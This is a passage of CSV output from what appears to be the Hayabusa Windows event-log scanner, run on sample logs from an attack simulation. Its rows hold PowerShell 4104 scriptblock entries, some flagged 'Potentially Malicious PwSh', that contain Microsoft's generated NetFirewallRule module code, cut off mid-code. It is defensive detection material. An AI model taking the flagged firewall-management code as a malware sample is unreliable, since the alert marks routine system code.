'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 